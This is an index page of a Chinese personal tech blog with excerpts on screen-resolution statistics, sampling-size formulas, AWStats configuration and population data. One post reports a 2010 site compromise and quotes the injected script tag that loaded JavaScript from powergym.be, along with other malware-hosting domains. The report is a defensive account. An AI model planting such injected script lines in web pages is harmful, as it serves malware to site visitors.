2011年01月07日

电脑屏幕分辨率分布统计(基于CNZZ统计数字)

  • 1024x已经低于40%;
  • 疑问: 1366x 增加最多?
  • 疑问: 800x 略有增加?
  • 2010年12月份的其他分辨率的量为0%, 2009年还有5.9%;

按宽度汇总的分布: 统计如下

 

分辨率 2009年12月 2010年12月 变化量
1024x 46.5% 39.3% -7.2%
1280x 21.4% 23.7% 2.3%
1440x 15.2% 18.3% 3.1%
1366x 2.6% 9.1% 6.4%
1680x 3.5% 4.4% 1.0%
1152x 3.1% 3.2% 0.1%
800x 1.9% 2.1% 0.2%

 

按此阅读全文 "电脑屏幕分辨率分布统计(基于CNZZ统计数字)" »

2010年10月29日

又到一年校招时: 校园用户使用的招聘类网站对比

最近搜狗在进行校园招聘,面试过程中对北京IT类应届生对招聘类网站的需求也做了一些调查。 应届生中的典型使用情景是这样的:

搜集:应届生网站搜集各种面试经验/消息;
订阅:利用过来人订阅感兴趣的公司面试消息(手机订阅);
提交:在各种招聘类网站中中华英才的校招平台最受重视,因为很多公司的校招平台都用的是中华英才的,但是各种求职网站校招简历和社招简历需要分别提交也是很明显的问题;
分享: 本校的BBS论坛, 北京地区IT类里面:北邮人,水木都非常火爆,各种BBS也是其他面试的学生面试前参考信息源;

按此阅读全文 "又到一年校招时: 校园用户使用的招聘类网站对比" »

2010年08月01日

MT上“Name "Locale::Maketext::Lexicon" used only once:” 问题的解决: 改用Perl内置函数库

最近从服务器日志中经常发现MT的错误日志:
Name "Locale::Maketext::Lexicon" used only once: possible typo at
.../extlib/Locale/Maketext.pm line 653.,....

解决方法:
删除 mt/extlib/目录下的I18N/ 和 Locale/ 目录即可;

原因:
服务器上已经升级到Perl 5.10.x了: 很多国际化字符集方面的支持直接使用Perl内置的支持包即可。
[chedong@titans ~/logs/chedong.com/http]$ perl -v

This is perl, v5.10.0 built for x86_64-linux-gnu-thread-multi

Copyright 1987-2007, Larry Wall

Perl may be copied only under the terms of either the Artistic License or the
GNU General Public License, which may be found in the Perl 5 source kit.

Complete documentation for Perl, including FAQ lists, should be found on
this system using "man perl" or "perldoc perl". If you have access to the
Internet, point your browser at http://www.perl.org/, the Perl Home Page.

按此阅读全文 "MT上“Name "Locale::Maketext::Lexicon" used only once:” 问题的解决: 改用Perl内置函数库" »

2010年07月17日

如何确定抽样统计的最小样本量(附:随机抽样统计的抽样误差Excel计算表格)

在电视节目中经常看到关于选举的报道中经常会后有支持率的数字,例如:调查结果为

  • a方支持率为45.3%;
  • b方支持率为30.2%;
  • c方支持率为8.5%;
  • ...

最后都会说明一下,此次电话调查的数量2352,置信度为95%﹐最大抽样误差为±2.5%。

抽样调查的典型情景:对一个大的集合(比如:数千万选民)做一次调查的成本较高,抽样调查可以低成本的用近似的(可接受的)数据反映实际情况;在用户调研中,也经常通过通过抽样调查的方式并对比打分的方法做评估。这里就需要了解置信度和抽样误差的概念;

抽样误差: 假如相同规模的抽样调查进行多次, 抽样均值在真实均值的上下波动,相对于整体均值的偏移波动就是抽样误差,而这个误差的分布是符合标准正态分布的,例如下图: 横轴为整体的均值,圆点是每次抽样的均值,而红色那次抽样就是加上误差后都未覆盖到均值线的情况); 

 

最小抽样量的计算公式: 抽样量需要 > 30个才算足够多,可以用以下近似的误差/样本量估算公式;

n: 为样本量;
\fn_jvn \120dpi {\sigma}^2方差,抽样个体值和整体均值之间的偏离程度,抽样数值分布越分散方差越大,需要的采样量越多;
E: 为抽样误差(可以根据均值的百分比设定),由于是倒数平方关系,抽样误差减小为1/2,抽样量需要增加为4倍;
\fn_jvn \120dpi ^{z_{\alpha/2}}: 为可靠性系数,即置信度,置信度为95%时,\fn_jvn \120dpi ^{z_{\alpha/2}}=1.96,置信度为90%时,\fn_jvn \120dpi ^{z_{\alpha/2}}=1.645,置信度越高需要的样本量越多;95%置信度比90%置信度需要的采样量多40%;

为了体现相对差距: 假设抽样均值为 y

相对抽样误差 h = E / y

变异系数 C= σ / y


以下是基于抽样得分的抽样误差估算表格: 方差越大需要的样本量越多,数据离散度越低,需要的抽样量越少;

置信度相对抽样误差(假设:C=0.4)
1%2%3%4%5%
95%6147 1537 683 384 246 
90%4330 1082 481 271 173 

如果是基于胜出率,支持率等: 分值为0/1状态分布,公式拟合为

 

π为按照经验得出的最后比例,在未知时π可取50%,待算出结果后再重新拟合,比例越悬殊需要的样本量越少; 

 

置信度相对抽样误差
1%2%3%4%5%
95%960424011067600384
90%67651691752423270

从而看出大部分的电话抽样调查:95%置信度的情况下,误差要控制在2%以内取样量一般在2000-5000;为了方便计算抽样调查的误差和估算抽样量,制作了一个Excel表格附后,调整颜色框中的抽样量数字就可以得到相应的误差或根据指定的误差范围估算出抽样量;

按此阅读全文 " 如何确定抽样统计的最小样本量(附:随机抽样统计的抽样误差Excel计算表格)" »

2010年06月05日

AWStats 7.0 发布, Linux下的安装配置使用备忘

5月25日,Eldy发布了AWStats的7.0版本,从界面上看主要的变化是很多统计图使用了Google图表API生成;
awstats_70_googlechartapi.png

在Linux的安装请参考AWStats安装笔记, 此次更新后的相关配置修改都放到补充库里了;
包含chedong.com的awstats配置样例:awstats.chedong.conf
通用配置文件样例: coommon.conf
搜索引擎和蜘蛛定义更新: robots.pm search_engines.pm (需要放到lib目录下)

缺省建议启用的配置:common.conf
LoadPlugin="tooltips"
LoadPlugin="decodeutfkeys"
LoadPlugin="graphgooglechartapi"
LoadPlugin="geoip GEOIP_STANDARD /home/chedong/chedong.com/cgi-bin/awstats/GeoIP.dat"
LoadPlugin="geoip_city_maxmind GEOIP_STANDARD /home/chedong/chedong.com/cgi-bin/awstats/GeoLiteCity.dat"
LoadPlugin="qqhostinfo"

搜索引擎定义主要去掉了一些门户网站的域名(例如: 163.com live.com),避免了搜索服务和门户其他服务(例如: 博客)容易和搜索来源混淆的情况。
蜘蛛定义主要增加了feed抓取机器人:
'sosospider','SosoSpider',
'youdaobot','YoudaoBot',
'doubanbot','DoubanBot',
'friendfeedbot','FriendFeedBot',

AWStats 7.0的详细ChangeLog更新附后:

按此阅读全文 "AWStats 7.0 发布, Linux下的安装配置使用备忘" »

2010年05月24日

[招聘] 中文的LinkedIn项目招聘服务器端Linux开发和Windows客户端开发

创业者实在太低调了,不想透露太多。 感兴趣的同学请看后面的详细说明:

按此阅读全文 "[招聘] 中文的LinkedIn项目招聘服务器端Linux开发和Windows客户端开发" »

2010年04月05日

在Dreamhost遭遇挂马: powergym.be

4月1日中午,有朋友发来邮件: 访问 chedong.com 的页面时;
该网站可能含有恶意软件,有可能会危害您的电脑。
http://www.google.com.hk/interstitial?url=http://www.chedong.com/

到Google的诊断页看了一下:

我们过去 90 天内对此网站上的 2 张网页进行了测试,发现有 1
张网页在未经用户同意的情况下就会将恶意软件下载并安装到用户的机器中。Google 上次访问此网站的日期是
2010-03-31,上次在此网站中发现可疑内容的日期是 2010-03-30。
Malicious software includes 2 exploit(s). Successful infection
resulted in an average of 1 new process(es) on the target machine.
恶意软件托管在 3 个域上,其中包括 surrogaty.uz.ua/, abseconbluedevils.org/, powergym.be/。
2 个域以传播媒介的身份向此网站的访问者散发了恶意软件,其中包括 abseconbluedevils.org/, help2strike.org.ua/。
This site was hosted on 1 network(s) including AS26347 (DREAMHOST).

登录到服务器上:
grep -R powergym *
发现数十个目录缺省页 index.html index.php default.html 全部在3月30日被附加了这样一行script:
script language='JavaScript' src='http://powergym.be/xxxxss36dj.js'

回家后断断续续折腾了2天,终于将大部分目录回滚到了3月30日之前;近期还在和DreamHost联系,查看系统登录日志,查看各个目录下的应用安装情况;

按此阅读全文 "在Dreamhost遭遇挂马: powergym.be" »

2010年02月09日

中国人口年龄构成统计 2007 - 2100

最近刚看完《异类》一书:其中讲了有所成就的人士除了10,000小时定律之外很重要的(而且经常被人们忽视的)一个因素就是人口的变化。因此也额外对人口变化趋势非常关注,高巍为此做了一个星座和中国人口出生量的统计。 我看到一个人口构成数字是清议在《可预见的中国式灾难》中引用的田雪原《中国人口预测结果》(原始出处未找到)人口年龄统计:制成图表如下
中国人口年龄构成统计 2007 - 2100
原始数据表格列表如下(单位:万人):
年份       总人口	0~14岁	15~64岁	65岁以上 新增劳动人口 抚养比	
2007年	132,129 	25,633 	95,794 	10,702 	2,142 	37.9%	2007年实际值
2008年	132,978 	24,911 	96,938 	11,129 	2,119 	37.2%	
2009年	133,634 	24,524 	97,713 	11,397 	2,072 	36.8%	
2010年	134,279 	24,289 	98,301 	11,688 	2,076 	36.6%	
2011年	134,916 	24,093 	98,807 	12,016 	2,046 	36.5%	抚养比谷底
2012年	135,543 	23,994 	99,152 	12,397 	1,949 	36.7%	
2013年	136,144 	23,943 	99,401 	12,801 	1,840 	37.0%	
2014年	136,706 	23,941 	99,465 	13,300 	1,776 	37.4%	
2015年	137,213 	23,657 	99,682 	13,875 	1,706 	37.7%	
2016年	137,652 	23,305 	99,918 	14,430 	1,650 	37.8%	
2017年	138,014 	22,980 	99,920 	15,114 	1,602 	38.1%	劳动人口峰值
2018年	138,294 	22,671 	99,800 	15,823 	1,597 	38.6%	
2019年	138,491 	22,365 	99,534 	16,592 	1,619 	39.1%	
2020年	138,614 	22,059 	99,170 	17,386 	1,587 	39.8%	
2021年	138,668 	21,735 	98,852 	18,080 	1,597 	40.3%	总人口峰值
2022年	138,658 	21,390 	98,466 	18,803 	1,608 	40.8%	
2023年	138,592 	21,018 	98,140 	19,434 	1,620 	41.2%	
2024年	138,471 	20,617 	98,107 	19,748 	1,626 	41.1%	
2025年	138,301 	20,186 	98,102 	20,012 	1,635 	41.0%	
2026年	138,082 	19,722 	98,349 	20,011 	1,641 	40.4%	65岁以上超过14岁以下人口
2027年	137,813 	19,228 	98,220 	20,365 	1,648 	40.3%	
2028年	137,493 	18,716 	97,140 	21,637 	1,654 	41.5%	抚养比之后每年上升一个百分点
2029年	137,123 	18,202 	96,157 	22,764 	1,658 	42.6%	
2030年	136,705 	17,701 	95,221 	23,783 	1,654 	43.6%	
2031年	136,239 	17,228 	94,226 	24,786 	1,654 	44.6%	
2032年	135,729 	16,799 	93,359 	25,571 	1,655 	45.4%	
2038年	131,793 	15,175 	85,651 	30,967 	1,383 	53.9%	
2048年	121,682 	13,546 	75,791 	32,345 	1,345 	60.5%	
2050年	119,163 	13,116 	73,701 	32,346 	1,331 	61.7%	
2060年	105,064 	10,605 	61,285 	33,174 	1,239 	71.4%	
2085年	71,256 	7,065 	40,042 	24,149 	  898 	78.0%	抚养比峰值
2100年	55,647 	5,596 	31,621 	18,430 	  601 	76.0%

按此阅读全文 "中国人口年龄构成统计 2007 - 2100" »

2009年12月22日

AWStats的自定义扩展统计:Using the Extra Sections features

如何利用AWStats针对网站自身应用进行特定参数的统计,今天学习了一下:AWStats Documentation - Using the Extra Sections features。文档中主要有以下几个例子:
# Example 1: Tracking Product orders
跟踪商品订单:解析出GET /cgi-bin/order.cgi?productid=49&session=A0B1C2 中的productid=字段
# Example 2: Tracking Bugzilla most frequently viewed bugs
跟踪bugzilla中最经常被访问的Bug:原理同上,这在内部开发中非常有用,类似的,也很容易给BBS系统配置出最常访问的论坛等统计。
# Example 3: Tracking Exit clicks
跟踪用户离开当前网站的点击:前提是你将所有指向其他网站的链接通过/cgi-bin/awredir.pl?url=http://externalsite/pagelinked这样的链接进行部署。
# Example 4: Tracking aborted download
跟踪中断的下载:利用的是HTTP返回的状态码206 ExtraSectionCodeFilter1="206"
# Example 5: Tracking most requested domain aliases
跟踪最常用的域名别名:这需要在日志中部署并定义扩展字段%your_extra_field,然后在ExtraSestion中部署统计相应的扩展字段%your_extra_field 这里的例子就是将域名的别名,在一个域名有多个别名的时候,分析那个域名最常用最有帮助。
# Example 6: List of top level 2 path under a directory /mydir
跟踪某个目录下最常访问的2级子目录,根据样例设置了一个 /tech /blog 2个目录下的TOP文章统计。

按此阅读全文 "AWStats的自定义扩展统计:Using the Extra Sections features" »

2009年09月20日

中国每年出生人口数 1976年 - 2000年 历年男女性别比

2010-01-06_201125.png 感谢高巍
以下是根据2000年全国分年龄、性别的人口数 《中国人口信息网》制作的一份图表;
年份	        总出生人口	男女比例	       男性	               女性
1976年出生	20,491,797	 1.04 	10,435,196	10,056,601
1977年出生	17,931,155	 1.03 	9,119,685  	8,811,470
1978年出生	18,831,591	 1.02 	9,519,345  	9,312,246
1979年出生	18,924,822	 1.02 	9,548,059  	9,376,763
1980年出生	18,393,809	 1.03 	9,315,481  	9,078,328
1981年出生	19,122,938	 1.04 	9,752,137  	9,370,801
1982年出生	23,100,427	 1.04 	11,786,950	11,316,732
1983年出生	20,065,048	 1.05 	10,275,677	9,789,371
1984年出生	20,313,426	 1.06 	10,468,201	9,845,225
1985年出生	20,429,326	 1.08 	10,598,460	9,830,866
1986年出生	23,190,076	 1.08 	12,023,710	11,166,366
1987年出生	25,282,644	 1.08 	13,619,530	12,663,114
1988年出生	24,576,191	 1.08 	12,779,621	11,796,570
1989年出生	25,137,678	 1.09 	13,110,848	12,026,830
1990年出生	26,210,044	 1.11 	13,811,030	12,399,014
1991年出生	20,082,026	 1.13 	10,674,963	9,407,063
1992年出生	18,752,106	 1.15 	10,014,222	8,737,884
1993年出生	17,914,756	 1.15 	9,590,414  	8,324,342
1994年出生	16,470,140	 1.17 	8,866,012  	7,604,128
1995年出生	16,933,559	 1.18 	9,157,597  	7,775,962
1996年出生	15,224,282	 1.19 	8,257,145  	6,967,137
1997年出生	14,454,335	 1.20 	7,897,234  	6,557,101
1998年出生	14,010,711	 1.22 	7,701,684  	6,309,027
1999年出生	11,495,247	 1.23 	6,332,425  	5,162,822
2000年出生	13,793,799	 1.18 	7,460,206  	6,333,593
2011-01-13_095709.png
80-84年=100,995,648	相当于85-89年的85%
85-89年=118,615,915	
90-94年=99,429,072	相当于85-89年的84%
95-99年=72,118,134	相当于85-89年的61%
以85-89年出生为1, 可以对比看到相对于峰值阶段,95后相对于峰值时期降低40%; 中国的人口红利将与2015年前后消失;

按此阅读全文 "中国每年出生人口数 1976年 - 2000年 历年男女性别比" »

最近评论

Creative Commons(创作共用)授权
此 Blog 中的日记遵循以下授权 Creative Commons(创作共用)授权.
Powered by
Movable Type 3.36